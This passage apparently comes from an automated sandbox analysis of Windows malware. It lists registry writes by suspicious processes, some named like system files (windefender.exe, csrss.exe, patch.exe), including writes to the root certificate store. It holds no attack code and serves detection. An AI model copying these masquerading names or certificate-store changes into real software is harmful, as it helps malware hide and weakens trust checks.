| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-22 = "Cape Verde Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-G37C5.tmp\DUxkNmj5MiGf8BNoRKpbAk7D.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-G37C5.tmp\DUxkNmj5MiGf8BNoRKpbAk7D.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe | N/A |
